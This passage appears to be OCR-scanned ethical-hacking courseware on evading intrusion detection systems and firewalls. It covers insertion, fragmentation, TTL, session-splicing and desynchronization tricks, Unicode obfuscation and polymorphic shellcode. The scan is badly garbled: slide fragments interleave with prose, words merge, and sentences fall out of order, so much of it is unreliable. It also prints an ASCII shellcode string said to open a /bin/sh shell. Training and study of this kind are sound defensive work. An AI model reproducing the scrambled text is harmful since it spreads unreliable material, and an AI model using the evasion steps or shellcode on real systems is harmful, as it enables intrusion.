Sheicode
Deniakot
Service
tack Overlapping
Fragments
Aoplcation
Layer Attacks
obfucatng Time-To-ve
Atacks Desypehronisation
False
Postive
Generation BEY tansrrociess Encryption
Session
Splicing fi: ot ooding
IDSEvasionTechniques
IDSthat provide an extra layer to the organization's
of security infrastructureare interesting
targetsfor attackers.Attackersimplement various IDSevasion techniques to bypass such
securitymechanisms and compromisethe infrastructure.IDS evasion is the processof
modifyingattacksto foolthe IDS/IPS that the traffic is legitimate
into interpreting and thus
preventthe IDSfromtriggeringan alert. Many IDSevasion techniques can performIDSevasion
differentandeffectiveways.
in
+
Insertion
Attack
Evasion
Time-To-Live
Attacks
InvalidRSTPackets
+
DosAttack Flag
Urgency
Obfuscating Polymorphic
Shellcode
FalsePositiveGeneration ASCIIShelleode
Splicing
Session Application-Layer
Attacks
UnicodeEvasion Desynchronization
Fragmentation
Overlapping
Attack
Fragments
Encryption
Flooding
ical andCountermensores
Mackin ©by E-Comel
Copyright
Insertion Attack
“Th
stint ds i a eno ad tala ep nod
TDester
srs cob ch He oman He nr pe
a¥<¥5)
Tora)
(af
©
pyarete ae
OOO
©
fg Juonhatwaterenhoweee
InsertionAttack
Insertionis the processbywhichthe attacker confuses the IDSbyforcing it to read invalid
packets (ie, the systemmay not accept the packet addressed to it).An IDSblindly trusts and
accepts a packet that an end system rejects.fa packet is malformed or if it doesnot reach its
actualdestination, the packet is invalid,If the IDS readsa n invalid packet, it gets confused.An
attacker
is
less
exploits
andthe IDSconcludes
thiscondition
strict i n processingpackets
and
inserts
datainto the IDS.Thisattackoccurs whenthe NIDS
thanthe internalnetwork.Theattackerobscures
that the trafficis harmless. Hence, the IDSgetsmore packets
extra traffic
than the
destination.
To understandhow insertion becomesa problem for a network IDS,i t is important to
understandhow the IDSdetectsattacks.It employs pattern-matchingalgorithms to look for
specific
patternsof datai n a packet or stream of packets.Forexample, it might searchfor the
“ph―
stringin an HTTPrequest
attackerwho can insert packets
instance,an attacker
a
to discover PHFCommon
Gateway
Interface
into the IDScan preventpatternmatching
can sendthe string“phf―
to a webserver, attempting
(CGI)attack.An
from working.
to exploit
For
theCGI
vulnerability,
but forcethe IDSto read“phoneyf―(by“inserting―
the string“oney―)
instead.A
straightforward intentionally
insertion attackinvolves the IP checksum.
corrupting packet
Every
transmittedo n
an IPnetworkhasa checksum that verifiesthe corrupted packets. IPchecksums
are 16-bitnumbers computed
by examiningtheinformation i n the packet. If thechecksum on
an IP packet
doesnot matchthe actualpacket, the addressed hostwill not accept it, whilethe
IDS mightconsiderit as partof
Forexample, theattacker
the
effectivestream.
can sendpacketswhosetime-to-live (TTL)
fieldsare craftedto reach
the IDSbut not the targetcomputers.Thiswill resulti n the IDSandthe targetsystem having
differentcharacter
‘two An attackerconfronts
strings. the IDSwith a stream of one-character
Module2 1527
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
packets (theattacker-originated
datastream), (theletter“X")
in whichone of the characters
will be acceptedonlybythe IDS,As a result,
the IDSand the end systemreconstruct two
different
strings.
of folol
<1) (ol dolor
io
Accepted
Monitor
iG)
Insertion of the letter ‘X’
105
using
12:34:Evading
Figure attack
insertion
Module2 1528
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
Evasion
1Inthis
technique,
system
packet
that
evasion an end accepts
a an IDSrejects
(@Using
18Theattacker
the
thisteennique
sends
explots
an attacker thehostcomputer
oftherequest
portions
without
thatthe105mistakenly
i n packets allowing
rejects, the
removal
IDSever realizing
it
byteby-byte
andone bytes
05,
'ssent
bythe
‘ejected the10S
c annot
lalal «
= Monitor ccepted
i
te -|
Healicay
Seam Insertionofthe
tetera"
Figure
12.35;
lustrationof technique
Evasion
Module2 1529
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
Denial-of-ServiceAttack (DoS)
{©Many 05suse a centralized
server for logging
alerts
|G tthe attackers
knowtheIPaddress
ofthe centralized
server, theycan perform
D oSor otherh acks
toslowdown or crash
theserve
“Asrest, the attackers’
intrusion willnot belogged
attempts
© cnrene seer
ing this
technique,
anattacker ‘autesmoe
than
handled
by syste
alas can be management ch a taba
Denial-of-ServiceAttack (DoS)
Multiple
typesof DoSattackwill work againstIDS.Theattackeridentifiesa pointof network
thatrequirestheallocation
processing of a resource, causinga condition
to occur i n whichallof
Theresourcesaffectedbythe attackera re CPUcycles,
that resource is consumed. memory,disk
space,andnetworkbandwidth.Attackers monitor andattackthe CPUcapabilities
of the IDS.
Thisis becausethe IDSneedshalf of a CPUcycle to readthe packets,
detectthe purposeof
their existence,andthen compare themwith some locationi n the savednetworkstate. An
attackercan verifythe most computationally expensivenetwork processingoperations and
compel
‘then the IDSto spendall its time i n carryingout useless
work,
IDSrequiresmemoryfor a varietyof taskssuchas generating
‘An a matchforthe patterns,
saving the TCPconnections, reassembly
maintaining queues, and producing buffersfor the
data. In the initial phase,
the systemrequires memoryto read the packets.
The system will
allocatethe memoryfor networkprocessing An attackercan verifythe processing
operations.
operations
formeaningless information. to
that requirethe IDS allocatememoryandforcethe IDSto assignall of its memory
ical andCountermensores
Mackin ©by E-Comel
Copyright
IDS,
‘The unlikean end system,must readeveryone’s
packets,not just thoseexplicitly
sent to it.
An attackercan overloadthe networkwith meaningless
informationand preventthe IDSfrom
keeping
up withwhatis happening
on thenetwork.
Many IDStoday employ centrallogging servers that are usedexclusively to store IDSalert logs.
‘The
centralserver'sfunction is to centralizealert data so that it is viewedas a wholerather
thanon a system-by-system basis.
However,
if attackersknowthe centrallogserver'sIPaddress,
theycouldslowit downor even
crash Aftershutting
it usinga DoSattack. downtheserver, attackscouldgounnoticed
because
thealertdatais now no longer
logged
Using
thisevasiontechnique,
an attacker
Causes
=
Causes
personnel
to
investigate
all to beunable
(such
thealarms
m ore alarmsthan can be handledbymanagement
Causes systems as databases,
etc.)
Fillsup diskspace,preventing
attacksfrombeing logged
Consumes the device's
processing
power andallowsattacks
to sneakby
ical andCountermensores
Mackin ©by E-Comel
Copyright
Obfuscating
‘buscatng usedbyattackers
sa 105evasion technique whoencode
theattack
packet
payload
in such
a
pthin
@ ‘eaters thefol
aioe e reerenced sinatureto the MOS
] trrvters
encode
stack
pattern
con
unicode
05 to bypass fier, but b eunderstood
we
byan IS server
code
Polymorphic i another
means IDSsbycreatingerent
to creumventsgatur-base
attack patterns,
Obfuscating
Obfuscation or read,
means to makecodemore difficult to understand generallyfor privacy or
security purposes. converts a straightforward
A tool calledan obfuscator programinto one that
worksi n the sameway but whichis much
CObfuscating
is an IDSevasion technique
more
difficult
to understand.
usedbyattackersto encodethe attackpacketpayload
in sucha
manipulatesway
thatthedestination
hostcan only
decode
the packet
the pathreferencedi n the signature
attackercan encodeattackpackets
but not theIDS.An attacker
to fool the HIDS.Using
Unicodecharacters,
thatthe IDSwouldnot recognizebut whichan 1ISweb
an
ical andCountermensores
Mackin ©by E-Comel
Copyright
FalsePositiveGeneration
-tackerswith inowledge
ofthetarget1Seratmalicious
packets
jst to alerts
generate
of
the10Suntied
‘tacks cn bypass a ts ifiut to ferentite theattackraf fram
the age volume fae postive
FalsePositiveGeneration
Thismodedoesnot attackthe target;instead, it doessomething relatively
ordinary. In this
mode, theIDSgenerates an alarmwhenno condition i s presentto warrantone. Another attack
similarto the DoSmethodis to create a significant
Attackers construct maliciouspackets known to trigger of
amount alert datathat the IDSwill log,
alertswithin the IDS,forcing it to
generate a large
i n a n attempt
looking
of
number falsereports. Suchan attackcreatesa large amount of log“noise―
to blend real attackswith fake ones. Attackersknowall too well that when
at logdata, it can be challenging to differentiatebetweenlegitimate attacksandfalse
positives. if attackersknowthe IDS, theycan even generate specific
falsepositives to that IDS.
‘Attackers
then use thesefalsepositive alertsto hiderealattacktraffic.Attackerscan bypass IDS.
unnoticed, as it is difficult to differentiatethe attacktraffic from the large volumeof false
positives.
ical andCountermensores
Mackin ©by E-Comel
Copyright
SessionSplicing
splicing
‘Session i a technique used
suchthat no
packets
‘many
the DSwhere
to bypass
he ragesthe10S an
attachersplits
theattackrafiinto
BED testes
2c aor ofa ety in packet
esse
atte
5, ty an a eas betweeeke
‘Many
IDSs hey donat cecelve packetswithin
stopreassembly a cetan time
reassembly
time
SessionSplicing
Sessionsplicing is an IDSevasion technique that exploitshow some IDSdo not reconstruct
sessionsbefore pattern-matching thedata.Itis a network-level evasion methodusedto bypass
IDSwherean attackersplits the attacktrafficinto an excessive numberof packets suchthat no
single packet triggers theIDS.The attacker dividesthedatai n thepackets into smallportionsof
2 few bytes andevadesthe stringmatchwhile delivering the data.TheIDScannot handlean
excessive numberof small-sized packets andfails to detectthe attacksignatures.If attackers
knowwhatIDSis in use,theycouldadddelays betweenpackets to bypassreassembly checking,
Thisapproach is effectiveagainst IDS that do not reconstruct packets before checking them
against intrusion signatures.If attackersare aware of the delay i n packet
reassembly at the IDS,
theycan adddelays betweenpacket transmissionsto bypass the reassembly.
ManyIDSreassemble communication streams;hence,if a packet is not receivedwithin a
reasonableperiod,
manyIDSstopreassembling and handlingthat stream. If the application
under attack keeps a session active for a longer time than that spent bythe IDS on
reassembling it, the IDSwill stop.As a result,any sessionafterthe IDSstopsreassemblingthe
sessions will be susceptible to maliciousdatatheft byattackers.TheIDSwill not loganyattack
attemptaftera successful splicingattack.Attackerscan use toolssuchas Nessusforsession-
splicing attacks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
UnicodeEvasionTechnique
For
example, / %u2215,
%u00e9[UTF-16)
€ + > %e2KH9%90
and©> Kc2¥a9, UTF-
ofthesme characters,
terpetations
thisas an advantage,
Taking attackers
can
to
convertattackstrings Unicode
characters
o avd a nd
pattern
UnicodeEvasionTechnique
Unicodeis a charactercoding systemthat supportsencoding, processing,and displaying
of
written texts for universal
languagesto maintain consistency
i n a computer representation.
Severalstandards, suchas Java,
LDAP,andXML, requireUnicode, andmanyOSandapplications
supportit. Attackerscan implementan attackbydifferentcharacter encodingsknownas “code
points― Themost commonly
i n the Unicodecodespace. usedcharacterencodings
are Unicode
Transformation
For Example:
(UTF)-8
Format and UTF-16.
the character“/"
In UTF-16, as “%u2215"
can be represented and “e―
as
*9u0029";
i n UTF-8,
Problems
with Unicode:
"©"
can be represented
as “%éc2%a9"
and“#―
as “%4e2%89%a0.―
ical andCountermensores
Mackin ©by E-Comel
Copyright
Fragmentation
Attack
canbeused
Fragmentation san atack
betwenthe 19Sandthehost
reassembly
Ifthefrazment
wil timeout
attackers andthe second
1Srec aftersending
fragment
theist agment
i
1096
In thiscena,
the10S wldropthe
athe second
fragments fra “ene
the fragments
estem wl reassemble
target
“ae
delays
sytem
with 25se unt al l theattack
athe target
pyloadreaeembled
Fragmentation
Attack (Cont'd)
‘A
simlarfragmentation
‘works
when
attack
theDStimeout
Fragmentation
Attack
IP packetsmust followthe standardMaximumTransmission Unit (MTU) size whiletraveling
across the network.If the packetsize is exceeded,it will be splitinto multiple fragments
(‘fragmentation’).
TheIPheadercontains of a fragment ID,fragment offset,fragment length,
fragments and othersbesidesthe original
flags, data. In a network, the flow of packetsis
irregular;
hence,systems needto keep fragments around, wait forfuturefragments, andthen
reassemble themin order.Fragmentation can beusedas an attackvector whenfragmentation
ical andCountermensores
Mackin ©by E-Comel
Copyright
timeouts vary betweenthe IDSand the host.Through the processof fragmentingand
reassembling,
attackerscan sendmaliciouspackets over the network to exploit
and attack
To avoiddetectionby an IDS,attackers
systems. may exploitfragmentationby usingthe
fragment
reassemblytimeout, whichvaries fromsystem to system.
Attack
-1
Scenario
If,forexample,
system,
thefragment reassembly
thisscenario,the IDSwill drop
the fragment
10 s
timeout is s at theIDSand20 at thetarget
attackerswill sendthe secondfragment 15 s after sending
the first fragment.
on receivingthesecondfragment
In
afterits
reassembly timeout,but the targethostwill reassemble the fragments.
Attackerswill
continue sending fragments with intervals of 15 s until the attack payload is
reassembled at the targetsystem.Thus,the victim will reassemblethe fragments and
receive the attackcode, whereasthe IDS will not detectthis or generatealertsas the
IDSdrops the fragments.
sec
=
Frag_timeout
20 sec
=|
Time 15sec Waiting
12.36:
Figure attack
Fragmentation scenarios
Thefigure aboveillustratesthe discussed s cenario (Attack
Scenario-1).Theattackerwill
successfullyperform a fragmentation attackon a host.Theattackermanipulates the
orderand time of the fragments andsendsthosefragments to the victim machine.The
attackwill succeed whenthe NIDSfragmentation reassemblytimeout is lessthan the
victim'sfragmentation reassembly timeout,
ical andCountermensores
Mackin ©by E-Comel
Copyright
AttackScenario 2
-
A similarfragmentation
Sometimes,
attackworkswhenthe IDStimeout exceedsthat of the victim,
the IDSfragmentation
reassembly
timeout is greater
this scenario, considerthat the attackerhas fragmented
thanthat of a host.In
the attack packet into four
fragments: frag-1,
frag-2, frag-3,and frag-4.
Here,the IDS fragmentation reassembly
timeout is 60s, andthe fragmentation reassemblytimeout for thehostis 30s.
Initially,
the attackersendsfrag-2
andfrag-4, whichare received
the fragments’
reassembly
andfrag-4
a
with falsepayload
referredto as frag-2'
byboththe IDSandthevictim.Theattackerwaits until
timeout occurs at the victim'ssystem. In this attack,the
vietim hasnot receivedfrag-1,
error message.
so it will drop
the fragments
The attackerthen sendsa packet (frag-1,frag-3) an
without generating ICMP
with a legitimate
payload.
frag-3,and frag-4'.
fragments,
only
Now,the victim has frag-1
Here,frag-2'
the IDSwill perform
andfrag-3,
and frag-4’
a TCPreassembly
whereasthe IDS hasfrag-,frag-2’,
havefalsepayloads.
but drop
Withthe four received
the packet,as the computed
checksum forfrag-2'andfrag-4’
will be invalid.Iftheattackernow sends frag-2andfrag-
4 againwith a valid payload,the IDSwill have onlythesetwo fragments with a valid
payload,as the previousfragments will havebeenreassembled anddropped. Thevictim
will haveall fragments (Frag-1,frag-3, frag-2, frag-4)—with
valid payloads that will
readthepacketvalid
reassemble—and
as
ical andCountermensores
Mackin ©by E-Comel
Copyright
Overlapping
Fragments
Forexpe tel rpmentconti of100byte ofpond with sequence umber; thesecond agent com
of
SernOS
i origina
with
whesven
een
ae the
tate h esubsequentWindows
agment
fapment oi e fg
set
leo
eg,
05)
W2K#/2003]
and some operating
a o
&
Overlapping
Fragments
Attackersuse overlapping
fragments
to evadeIDS.In this technique,
attackersgenerate a series
of tinyfragments
with overlapping
TCPsequence numbers.For example, the initial fragment
consistsof 100bytes
of payload
with the sequence numberof 1,thesecondfragment includes
an overlapping
sequence of 96 bytes,
and so on. At the time of reassembling
the packet,
the
destination
hostmust knowhow to assemble TCPfragments.
theoverlapping SomeOSwill take
the original
fragments with a given offset(e.g.,
WindowsW2K/XP/2003) and some OSwill take
the subsequentfragments witha givenoffset(e.g., Cisco105).
Considera scenario in which theattackercarries out thisattackbybreaking
thepacketinto four
& a
re
12.36Evading
Figure Overlapping
0S using Fragments
ical andCountermensores
Mackin ©by E-Comel
Copyright
Time-To-LiveAttacks
(©These
atacksrequie
Tisinformtioncanbeobtained
betweenthe atacker
toa
the attacker have prior
usingtools
andthevim
knowledge
ofthetopology
ofthe
vtim's
of
s uch traceroutewhichg iveinformation
network
onthenamber routers
T heatacer sendsragwitha
gh
TT anda
Time-To-LiveAttacks
EachIPpacket
can takebefore a
has field calledTimeto Live(TTL),
a network nodediscards
by1. Whenthe TTLreaches0,the packet
it. Each
whichindicateshow many hops
router along
is dropped,
a datapathdecrements
the packet
this
value
and an ICMPalert notificationis sent to
the sender. Typically,
whena host sends a packet, it setstheTTLto a high valuesuchthat it can
reach its destinationundernormalcircumstances.DifferentOSuse different default initial
valuesfor the TTL. Therefore,attackerscan guessthe numberof routers betweenthemand a
sending machine, andmakeassumptions as to whatthe initialTTLwas, thereby guessing which
0S a hostis running,as a prelude to an attack.To prevent suchdetection, SmartDefense can
change the TTLfieldof all packets(orall outgoingpackets) to a givennumber.Theseattacks
require the attackerto have prior knowledge of the topology of the victim'snetwork.This
Information can be obtained usingtools suchas traceroute,whichgivesinformation o n the
numberof routers betweenthe attackerandthe victim.
Considera scenario i n whicha router is present betweenthe IDSand a victim. Attackersneed
to acquirethis informationbeforelaunching the TTLattack bybreaking the maliciousdata
packet into three fragments. It is assumed that the attackerhasprior knowledge about the
topology of the targetnetwork(i.e.,how manyrouters are there betweenthe attackerand
victim machines). Theattackerfragments the packet andsendsfrag1 with the TTL set to a
higher
value. by
a falsepayload attacker
sends
It is then received the victim andthe IDS.Then,
anda TTLvalueof 1,whichis receivedbythe IDS;
receive it, because the router discards
the
however,
it andthe TTLvalueis reduced
frag-2'with
the victim will not
to 0. Next,the attacker
sendsfrag-3
TTL
value,
with a correct payload
andthe victim. Afterreceivingfrag-3,
and a higher
the IDSperforms
whichenablesit to reachthe IDS
a TCPreassembly on fragments 1,2’,
and3,andthe
victim
frag-2.
waits for
victim, afterreceivingfrag-2,
Finally,
reassembles
the attackersendsfrag-2
fragments
with a validpayload.
1, 2, and3 andgetsthe attackcode
The
ical andCountermensores
Mackin ©by E-Comel
Copyright
payload.
embeddedi n a malicious Here,the IDShasonlyfrag-2, reassembled
as it hasalready
the fragments
andthe stream hascleared,
[—)
‘attacker
Fragdropped
at router
ComectResserbiy
Evading
12:39;
Figure Time-To-veattack
10Susing
ical andCountermensores
Mackin ©by E-Comel
Copyright
Invalid RSTPackets
packet
AST tothe 0S wth aniva checksum e ‘butthattheTCPcommunication
system
will the
receive packet
the target
sesion hasended
and drops
checksum @
‘The
attacke nables
Saunas
to
theattackerscommunist
Invalid RSTPackets
TheTCPuses 16-bitchecksums for error checking of the headerand dataand to ensure that
communication is reliable.
It addsa checksum to everytransmittedsegment that is checked at
the receivingend.Whena checksum differsfromthechecksum expected bythe receivinghost,
the TCPdropsthe packet at thereceiver's end.TheTCPalsouses an RSTpacket to endtwo-way
communications.Attackerscan use thisfeatureto eludedetectionbysending RSTpackets with
an invalidchecksum,whichcauses the IDSto stopprocessing the stream because the IDSthinks
that the communication sessionhasended.However, the endhostchecksthis packet, verifies
‘the
checksum value,andthen drops the packet if it is invalid.
SomeIDSmight interpretthis packet
as an actual
termination ofthe communication andstop
reassemblingthe communication. Suchinstancesallowattackersto continue to communicate
packet the
with the endhostwhile confusingIDSbecause theendhostacceptsthepackets that follow
the RST with an invalidchecksumvalue.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Urgency
Flag
BB
tre erentunerfaginthe hese
TcP i s usedto markthe
datathatrequiresweetprocessing
ttherecevingend
fl 6B a ae
eR fat Cr te ar poe
“Threats
inthe
1S andthetarget
yters havingerent
sets ofpackets,
whichan beexpe
by
tach
FlagAttack Example
‘Urgency
Urgency
Flag
Theurgency flagi n the TCPmarksdata as urgent.TCPuses a n urgency pointerthat pointsto
the beginning of urgentdatawithina packet. Whenthe user sets the urgencyflag, the TCP
ignoresall databeforethe urgencypointer, andthe datato whichthe urgencypointerpointsis
processed. if the URGflag is set,the TCPsetsthe UrgentPointerfieldto a 16-bit offsetvalue
that pointsto the lastbyteof urgentdata in the segment.SomeIDSdo not considerthe TCP’s
Urgencyfeatureand process all the packetsi n the traffic,
whereasthe target systemprocesses
onlythe urgentdata.Attackersexploit this featureto evadethe IDS, as seen in other evasion
techniques.Attackerscan place garbagedata
ical andCountermensores
Mackin ©by E-Comel
Copyright
Shellcode
Polymorphic
©
izes
‘wth
sess
and
portnson
incoming outgoing
detonate
datapaclats
anby
mating
(0S dees ck tac sates
‘Many
IDSsidentity fr thecommonly
s ignatures use strings
embeded in the
shlcode
shelicode
Polmorphie attacks
iclde multiple iit
making
signatures, to detecthesignature
‘As is completely
aesut of his the shelcode ewiten eachtime its sent,ths detection
evading
evades
shelcode
strings,
ato
‘Thistectnique thecommonly
used shllcode
thus making u nusable
s gnatres
Shellcode
Polymorphic
A signature-based networkintrusion detectionsystem (NIDS)
identifiesan attackbymatching
attacksignatures with incomingandoutgoing datapackets. ManyIDSidentify for
signatures
commonly used stringsembeddedin the shellcode.Polymorphic shellcodeattacksinclude
multiplesignatures,making it difficultto detect the signature.
Attackers encodethe payload
Usingsome technique andthen place a decoderbeforethe payload. Asa result,theshellcodei s
completelyrewritten eachtime it is sent,thereby evadingdetection.
Withpolymorphic shellcodes, attackershidetheir shellcode (attack code)byencrypting it with
an unknownencryption algorithm and including the decryption code as partof the attack
packet.To carryout polymorphic shellcode attacks,theyusean existingbuffer-overflowexploit
and set the “return―
memory addresso n the overflowedstackto the entrance pointof the
decryptioncode. Thismakes i t difficultfor the IDSto identify
it as a shellcode.
Therefore, when
attackersmodify/transform
their attacksin this way, the NIDScannot recognizethem.This
alsoevadescommonly
technique thus making
usedshellcodestrings, shellcodesignatures
unusable.
ical andCountermensores
Mackin ©by E-Comel
Copyright
ASCIIShellcode
Thstimitation
Instructions
forconverting to ASClvalues ||Pa
canbe overcome bywngothersetsof
propery
“andrwnbrictrsShtpetwndamtsPnatakst0
i
ASCIIShellcode
shellcodescontain onlycharacters
‘ASCII fromthe ASCIIstandard.Suchshellcodes allow
attackersto bypass
commonly enforcedcharacterrestrictions within the stringinputcode.
Theyalsohelpattackersbypass IDSpatternmatching signatures becausetheyhide strings
to polymorphic
similarly shellcodes.The IDSpatternmatching mechanism does not work
efficiently
Using
with
ASCII
values.
ASCIIfor shellcodeis very restrictive in that it limitswhat theshellcodec an do under
some circumstances,as not all assembly instructions convert directly
into ASCII values.This
restriction bypasses
usingotherinstructions,or a combinationof instructions,
whichconvert to
ASCIIcharacterrepresentation,
serving the same purpose as those instructions that convert
improper.
AnASCIIshellcodeexample
is givenbelow:
char shellcode[] =
"
LLLLYhbOpLXSbOpLHSSPPWQPPaPWSUTERDJENStDS|
a
YXODka0TkafhN9fYf1LkbOTK
"DksOtkw3
fYOLKEOTKgEA'
|
r£Y£1LKiOtkkh9Sh8Y1LkmjpYOLKkq0tkrh2wnuX1
£XODKkxOtkxOtkyCjn¥OLkzCOTk2CCjtxO"
kz COtkzC}
3XODKzOTKECOtKzChjG3IY1LKZCCCCO
k2ChpfcMX1Dk2CCCCOtkzCh4pCnY1Lkz1Tk2CCCC’
3a
HIGEXE1Dkz#1 tkzCCjHXODKZCCCC}VYOLKZCCC
"XODk2COTK2CJWXODK2OTK2C}AXODKZC}XYOLKZOtK―
"
gMdgvvn9F1r
Whenexecuted,
FS Sh@pG9wnuvjrN£rVx2LGkG3IDp£"
"cM2KgnnJGgbinYshdvb9d"
the shellcodeaboveruns a"/bin/sh" shell.“bin―
and “sh―
are contained
in the lastfewbytes
ofthe shellcode.
Module1 26 ical andCountermensores
Mackin ©by E-Comel
Copyright
Attacks
Application-Layer
\©Apoiations a cesing melas (ai, vdeo nd compressh em toa smaller ste
images) for maiming
thedaa transferate
‘The
cramp,
various
10Scan
are
integer overflow
cantons favorable
recognize
values
forattack,butalternativeforme
can beuredto explointeger
ofatack azoposible,
vulnerabilities
for
Attacks
Kpplication-Layer
Mediafilessuchas images, audios,
andvideoscan be compressed
so that they
can be rapidly
transferreda s smallerchunks.
Attackersfindflawsi n this compresseddata and perform
attacks; cannot identify
even the IDSsignatures the attackcodewithindatathuscompressed
Manyapplications
that deal with suchmediafiles employ
s ome form of compression to
increase the datatransfer speed.
Whenyou finda flawin theseapplications,
the entire attack
can occur within the compressed
data,andthe IDSwill haveno way to checkthe compressed
This enablesan attackerto exploit
file formatfor signatures. the vulnerabilities
in the
compressed data.ManyIDSlookfor specific
conditionsthat allowfor an attack.However,
there
are times whentheattackcan takemanydifferentforms.Forexample, can exploit
attackers
the integeroverflowvulnerabilitiesusingseveraldifferent integervalues.Thisfact,combined
with compressed data,
makessignature detection
extremely difficult.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Desynchronization
Pre-ConnectionSYN Post-Connection SYN
Intl SYN
beforetherealc onnection fromte atu numbers thatthekere
sequence honoring
estas
nthe
butwth an vals TP stackersendapst connection SYNpacha ata stream,
Ura
pace
isecmved
st
block
Centro
e
target
cr anaes he I
opened
atch that ofthenewly
thi
oferta
esabised
connection
ess
received
SYN
owever, the
‘eferects
Thetet ofthis
hostw ilgnare
attack
ito
SYN packet,
sit
getheOS 0 reymehronse
ts
‘ezynchranie
the 10S anew
completly vad sequence
n umber be
Steam,b ecause awatng ferent sequence
number
0S an
ST
: son :
ie stopsatacers
send packet
andstackate
legtimate
wth
the frommotoringal
thusclse te naton ofthe
he
conection
sequenceumber
a nd
Desynchronization
Pre-Connection
SYN.
This attack isperformed by sendingan initial SYN before the real connection is
established,butwithan invalidTCPchecksum,
SYNsi n a connection. if a SYNpacket
the IDSresets the appropriate
TheIDScan ignoreor
is receivedafterthe TCP
sequencenumberto matchthe newly
accept
subsequent
controlblockis opened,
received
SYN
packet.
AttackerssendfakeSYNpackets
with a completely
invalidsequence numbert o.
desynchronize all legitimate
the IDS.Thisstopsthe IDSfrommonitoring andattack
traffic. If the IDSis smart,it does not checkthe TCPchecksum. If the IDSchecksthe
checksum, theattackis synchronizedanda bogus sequence number i s sent to the IDS
beforethe realconnection occurs.
Post-Connection
SYN
In this technique,
attackersattempt
to desynchronize the IDSfromthe actualsequence
numbersthat the kernelis honoring. Senda post-connection SYNpacket in the data
stream,which will have divergent sequencenumbersbut otherwisemeet all the
necessary criteria to be accepted bythe targethost. However,the targethost will
ignorethisSYNpacket, as it referencesa n already establishedconnection. Thisattack
intendsto getthe IDSto resynchronize its notion of the sequence numbersto the new
SYNpacket. It will then ignore any datathat is a legitimate partof the original stream
becauseit will be waitingfor a differentsequencenumber.Onceyou succeedin
resynchronizing the IDSwith a SYNpacket, senda n RSTpacket with the new sequence
number andclosedownits notion oftheconnection.
ical andCountermensores
Mackin ©by E-Comel
Copyright
OtherTypes
of Evasion
and loads
(© Theatackersends of unnecessary trafficto produce
noise,
Flooding ifthe IDSdoesnot analyze
the noise tafe wel thenthe tr
attacktrafficmaygoundetected
Other Types
of Evasion
=
Encryption
intrusion detectionanalyzes
Network-based traffic i n the networkfrom the source to
thedestination.
Ifan attacker
succeedsi n establishing sessionwithhis/her
an encrypted
targethost usinga secure shell (SSH), secure socketlayer(SSL),
or virtual private
network (VPN) tunnel,the IDSwill not analyze the packetsgoing through these
encrypted communications. Thus,
an attackersendsmalicioustraffic using suchsecure
channels,thereby evading
IDSsecurity.
Flooding
IDSuse resources suchas memory and processor speed to analyze the traffic going
through
them,To bypass attackersflood IDSresources with noise or fake
IDS security,
traffic to exhaustthem with having to analyze flooded traffic. Oncesuchattacks
succeed, attackerssendmalicious traffictowardthe target systembehindthe IDS,which
offerslittle or no intervention. Thus,true attacktrafficmightgo undetected
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
Firewalls
Evading
The previoussection explained howattackers
use various techniques to bypass IDS.Similarly,
theycan alsouse various tricksand techniques
to bypass firewalls.Thissection discusses
the
different usedbyattackers
techniques to bypass
firewallsecurity.
ical andCountermensores
Mackin ©by E-Comel
Copyright
FirewallEvasionTechniques
Using
an Adres in StHandONSTunnating
BannerGrabbing
«Prony
Using Server
systems
UPAdress
Spoofing JemTunneling MITMAttack
“Trough
Tunneling
‘Ack ‘Trough
Content
‘Tiny
Fragments HTTPTumeling ‘Through
x85Attack
Firewall EvasionTechniques
Bypassing a firewall is a technique
wherebyan attackermanipulates the attacksequence to
avoidbeing detectedbythe underlying firewall.Thefirewalloperates
security on a predefined
set of rules,and with thorough and skill,an attackercan bypass
knowledge the firewall by
‘employing
various
firewall
bypassing
techniques.
Using the
firewallinto not filteringattacker
techniques,
the malicioustrafficgenerated
these
bytheattacker
tricksthe
Somefirewallbypassing
techniques
are as follows:
+
Port Scanning ICMPTunneling
+
Firewalking ACKTunneling.
+
BannerGrabbing
IPAddressSpoofing
HTTPTunneling,
SSHTunneling
SourceRouting
TinyFragments
DNSTunneling
Through ExternalSystems
an in of
Using IP Address Place aURL
Using WebsiteSurfing
Anonymous Sites
Through
MITM Attack
‘Through
Content
UsingProxy
a Server Through
XSSAttack
ical andCountermensores
Mackin ©by E-Comel
Copyright
FirewallIdentification
Port Scanning
Firewalking Banner Grabbing
Firewall Identification
Port Scanning
Ports arepointsfrom which computers send or acceptinformationfrom network
resources. Portscanning identify
i s usedto openportsandtheservices runningon these
ports.Finding
open portsis an attacker'sfirst steptowardgaining access to the target
system.To do so, the attackersystematically scans the target's
portsto identify the
versions of services, whichhelps
i n finding
vulnerabilitiesi n theseservices. Attackers
utilitiesto do so, manyof whichare
sometimes use automatedport-scanning easily
available.
How AttackersScanPorts
sending
Port scanningconsists of messages to eachport, one at a time. The kind of
responsereceivedindicateswhetherthe systemis usingthe port,leavingit exposedto
the discovery
of weaknesses. Some firewallswill uniquely identify
themselvesusing
simpleportscans.Forexample, CheckPoint'sFireWall-1listenson TCPports256,257,
258,and259,andMicrosoft'sProxyServer usuallylistenson TCPports1080 and1745.
Firewalking
Firewalking is a method of collecting information about remote networksbehind
firewalls.It is a technique that uses TTLvaluesto determinegateway ACLfiltersand
mapnetworksbyanalyzing the IP packet response.It probes ACLson packet filtering
routers/firewalls using the same methodas tracerouting. Firewalkinginvolvessending
TCPor UDPpackets into the firewallwheretheTTLvalueis one hopgreater than the
targeted firewall.f the packet makesit throughthe gateway, the system forwardsit to
the next hop, wherethe TTL equals one, andprompts a n ICMPerror message at the
ical andCountermensores
Mackin ©by E-Comel
Copyright
pointof rejection Thismethodhelps
with a "TTLexceededi n transit"message. locatea
additionalprobing
firewall; facilitatesfingerprinting
andidentificationof vulnerabilities.
Firewalkis a well-knownapplication used for firewalking.
It hastwo phases: a network
discovery phase and a scanningphase. It comes with various open-sourceLinux
distributions.Nmap hasa firewalkscriptthat can beusedto perform firewalking.
Banner
Grabbing
Bannersare service announcements provided byservices i n responseto connection
requests,andthey
methodof fingerprinting that helpsversion grabbing
often carry vendor information.Banner
i n detecting
is a simple
the vendor of a firewalland the
firmwareversion. It identifiesthe service running o n the system. Attackersuse banner
grabbingto fingerprint services andthusdiscover theservices runningon firewalls.The
